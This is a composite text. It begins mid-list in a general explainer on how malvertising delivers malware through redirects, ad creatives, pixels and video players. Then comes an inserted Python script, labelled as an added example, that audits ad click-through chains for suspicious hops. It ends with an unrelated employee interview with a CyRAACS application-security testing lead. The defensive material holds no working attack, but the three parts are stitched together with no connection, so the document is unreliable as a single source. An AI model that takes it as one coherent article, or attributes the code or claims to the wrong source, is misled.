2. Post-click malware injection: Users who click on an ad are typically redirected between multiple URLs, ending with the ad landing page. If any of the URLs along this delivery path are compromised by an attacker, they may execute malicious code.
3. Malware in Text or Banner Advertisements: Malware may be found in a banner ad or text message. For instance, an ad can be delivered in HTML5 as a combination of images and JavaScript which may contain malicious code.
4. Malware within a pixel of an image: Pixels are embedded with code in an advertisement call. A legitimate pixel sends data to the server for tracking purposes. If an attacker intercepts a pixel’s delivery path, they can send a response containing malicious code to the user’s browser.
5. Malware within the video: Video players don’t protect against malware. Examples are videos based on Flash or specific video formats such as VAST. The VAST video format contains pixels from third parties, which could contain malicious code. Videos based on Flash can inject an iframe into the page, which downloads malware even without the user clicking on the video. Flash files might also load a pre-roll banner; attackers can inject malicious code into the pre-roll banner, and it can run even without the user clicking on the video.
Common malvertisements generally need user interaction, such as the victim clicking on a malicious advertisement, in order for malware to be downloaded onto or infect the victim’s system. The following can happen to users who interact with malvertisements:
1. Download or installation of malware on the computer or system viewing the malicious advertisement.
2. Redirection of the user or victim to a malicious site.
Some advanced malvertisements can affect or cause harm to a user without user interaction. Malvertising might perform the following attacks on users who view the malvertisements without clicking on them:
1. A “drive-by download” — installation of malware or adware on the computer of a user viewing the ad. This type of attack is usually made possible due to browser vulnerabilities.
2. Forced redirect of the browser to a malicious site.
3. Displaying unwanted advertising, malicious content, or pop-ups, beyond the ads legitimately displayed by the ad network. This is done by executing JavaScript.
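One way a publisher or ad-operations team could audit a recorded ad click-through chain for the signs described above (unvetted hops, recently re-registered domains, downloads that no click asked for). This is an added example, not code from the original article; the host names, the allowlist, the 30-day threshold and the `Hop` record are assumptions constructed for illustration.

```python
from dataclasses import dataclass
from datetime import date
from urllib.parse import urlsplit

# Assumed policy values (hypothetical, not from the article).
APPROVED_AD_HOSTS = {"ads.example-exchange.test", "cdn.example-dsp.test"}
DOWNLOAD_TYPES = {"application/octet-stream", "application/x-msdownload",
                  "application/zip"}
RECENT_REGISTRATION_DAYS = 30


@dataclass
class Hop:
    url: str
    status: int
    content_type: str
    user_gesture: bool     # did a user click start this request?
    host_registered: date  # creation date from a WHOIS/RDAP lookup


def audit_chain(hops, landing_host, observed_on):
    """Return (hop_index, finding) tuples for one recorded click-through chain."""
    findings, seen_hosts, prev_scheme = [], set(), None
    for i, hop in enumerate(hops):
        parts = urlsplit(hop.url)
        host = (parts.hostname or "").lower()
        if host not in seen_hosts:  # report host-level findings once per host
            seen_hosts.add(host)
            # A hop outside the vetted ad partners and the declared landing page.
            if host not in APPROVED_AD_HOSTS and host != landing_host:
                findings.append((i, "unapproved-host"))
            # A domain re-registered after expiry shows a fresh creation date.
            if (observed_on - hop.host_registered).days < RECENT_REGISTRATION_DAYS:
                findings.append((i, "recently-registered-domain"))
        # The delivery path leaves TLS part-way through.
        if prev_scheme == "https" and parts.scheme == "http":
            findings.append((i, "https-to-http-downgrade"))
        # A file download that no click asked for: drive-by download candidate.
        media_type = hop.content_type.split(";")[0].strip().lower()
        if media_type in DOWNLOAD_TYPES and not hop.user_gesture:
            findings.append((i, "download-without-user-gesture"))
        prev_scheme = parts.scheme
    return findings


# Constructed sample data: two recorded chains starting from the same ad click.
OBSERVED = date(2024, 6, 1)
LANDING = "shop.example-advertiser.test"
_EXCHANGE = Hop("https://ads.example-exchange.test/click?id=1", 302,
                "text/html", True, date(2015, 3, 1))
_DSP = Hop("https://cdn.example-dsp.test/r?c=9", 302,
           "text/html", False, date(2016, 7, 12))
CLEAN_CHAIN = [_EXCHANGE, _DSP,
               Hop("https://shop.example-advertiser.test/sale", 200,
                   "text/html; charset=utf-8", False, date(2012, 1, 5))]
SUSPECT_CHAIN = [_EXCHANGE, _DSP,
                 Hop("http://old-brand-shop.test/go", 302,
                     "text/html", False, date(2024, 5, 20)),
                 Hop("http://old-brand-shop.test/update.exe", 200,
                     "application/x-msdownload", False, date(2024, 5, 20))]

if __name__ == "__main__":
    for name, chain in (("clean", CLEAN_CHAIN), ("suspect", SUSPECT_CHAIN)):
        print(name, audit_chain(chain, LANDING, OBSERVED))
```

These checks are heuristics for triage: a finding marks a chain for manual review rather than proving that the ad is malicious.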
What is your name and job title in CyRAACS?
My name is Anamika, I lead the Application security VAPT projects in CyRAACS.
How would you summarize what you do? Why is CyRAACS a great place to work?
At CyRAACS I am responsible for managing and leading VAPT projects wherein we must conduct VAPT assessments for IT systems, web applications, mobile applications, and critical network infrastructure. We as a team conduct manual application penetration testing of thick client applications, mobile applications, web applications, web services, and APIs to minimize exposure to attacks.
I am responsible for communicating with client teams often to explain and demonstrate vulnerabilities to application/system owners and assist with the mitigation of the identified vulnerabilities. I support fast-paced delivery in challenging projects. My job requires me to be highly motivated, detail-oriented, and client-focused.
CyRAACS is a great place to work because every day provides an opportunity to learn something new, to mentor, and to be mentored to achieve our client’s goals. Being part of a team that is focused and dedicated to stand up to client expectations and help employees succeed, is the best thing anyone can ask for in their career.
How long have you worked with CyRAACS?
I have had the pleasure of working in CyRAACS for nearly 3 years now.
What is the most interesting thing about working in CyRAACS, and about the work you do?
CyRAACS follows a no-hierarchy model wherein the management keeps their doors open to promote new ideas and transparency of information within the organization.
My job demands me to be constantly updated with the latest technologies to challenge myself to know more about the trend revolving around cyber security. I like the fact that I can interact with the key stakeholders and technical team to suggest security remediations in line with their business scenario.
My journey through these years has seen many changes come through in the organization, and each time, these have been for the better, for the leadership in CyRAACS is committed to making CyRAACS a big success story in the coming years.
What are three benefits you have discovered about working in CyRAACS that you weren’t aware of when you started?
My journey at CyRAACS has been very gratifying and rewarding. I always had opportunities and challenges beyond my current role which helped me prove myself and achieve greater heights.
CyRAACS has helped me achieve my professional goal by sponsoring my certification.
I have learned over these years about my own domain, but there has also been a lot of cross-functional learning which has helped in overall growth in my career.
At CyRAACS, individuals come in at different levels with different skill sets, expertise, aspirations, and attitudes. Here, at CyRAACS we learn to think independently, be focused, and push ourselves out of our comfort zone. This is a company that adds significant value to each employee, and it helps each individual reach her or his highest potential.
I am proud and humbled to be amongst such incredibly talented people and I am thankful for the opportunity to contribute to our continued success.
What are your thoughts about the company’s vision and direction, and your role in helping CyRAACS achieve them?
Management at CyRAACS has always been transparent about what they are doing to achieve the company’s vision and has ensured that we are kept aware of the progress the company is making.
When I see my leaders working hard to live the standards of the vision, I feel equally motivated to do the same. I believe that we should be accountable for meeting our own goals and doing our part to achieve the company’s vision and direction.
I agree with the fact that transparency is great for the company's vision, but it is also a good way to build trust with employees and customers. Staying transparent about the failures and successes of the company will help your employees be more engaged and productive.
What advice would you give a job seeker who’s thinking about applying for a job with CyRAACS?
My advice to job seekers would be if you are looking for a challenging, fast-growing environment with opportunities to learn cross-functional skills, CyRAACS is a one-stop for you.
Specifically, for freshers, this is a great place to start their career because here you are mentored at every step to push yourself and uncover your true professional.
The culture is transparent, every employee, irrespective of their position, is given a chance to be heard, and there are ample opportunities available to those who want to build a career here.
When you tell people about your job, what’s one thing that surprises them, or gets them excited about the work you do?
As the first job is considered the most important point in anyone’s career path, CyRAACS proved to be the right tipping point for me. I joined as a fresh MBA graduate.
Early in my career, I was given a chance to handle a separate developing service line – Application security and I was trusted with the responsibility of handling stakeholders on my own. The whole experience has been a great learning opportunity for me.
My growth graph has been exponential as the management here has been very supportive and has given me ample learning opportunities with meaningful rewards and recognition.
Your achievements, value provided to clients, client empathy, etc.
I have successfully completed 150+ projects with more than 50% repeat engagements.
Client achievement and empathy: I have received excellent recommendations from the majority of my clients highlighting the quality of deliverables, meeting up to the deadlines, and going beyond the set expectations from industry sector clients such as Banking industries, IT services, Healthcare, and Telecommunications.
On request from one of our clients, a tax consulting multinational company wherein the client had to make their application go live, we were given a strict deadline to complete the said task. Conducting VAPT and helping a client secure their application was one of the major responsibilities which I abided to. The client was very happy with the engagement and in turn, suggested their internal departments conduct VAPT for their other applications.
An overnight audit requirement for one of our clients operating in the small finance bank sector was a crucial task to be completed. A time constraint of 1 day was given to retest 10 applications. I took it as a challenge and had to push myself to meet the said timelines, and completed the task by leading my team. The client in return has extended their empanelment contract with us as their security partner.
For client-specific challenges wherein their application is inaccessible, or new functionality is introduced within the application, we have ensured that we accommodate such requests and perform multiple rounds of testing to make certain that all the functionalities of the application are tested, and the application is secure to go live on production. Clients have considered this as a key value provided to them, appreciating our extra efforts.
On request from one of our clients, an IT services company, we had to conduct VAPT for their application and infrastructure components wherein they were given a strict government deadline to abide by. This request was taken into priority and I had to drive it to completion within the said timelines. The client gave positive feedback on the engagement and gave our referrals to other partner companies as a result.
Achievements and Certifications
Client Success Stories
Repeat clients – Our quality output and focussed approach has made CyRAACS an empanelled security partner for many of the client projects led by me across various industry sectors such as Finance, Banking, IT services, Healthcare, Telecommunications.
Referrals – Many of our clients have given referrals to their other partner companies for CyRAACS as a security vendor.